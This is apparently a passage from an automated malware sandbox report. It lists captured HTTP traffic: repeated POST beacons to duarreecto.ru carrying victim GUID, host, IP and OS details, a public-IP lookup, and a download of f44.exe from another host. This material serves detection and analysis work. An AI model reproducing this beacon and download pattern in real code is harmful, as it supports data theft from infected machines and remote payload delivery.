      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
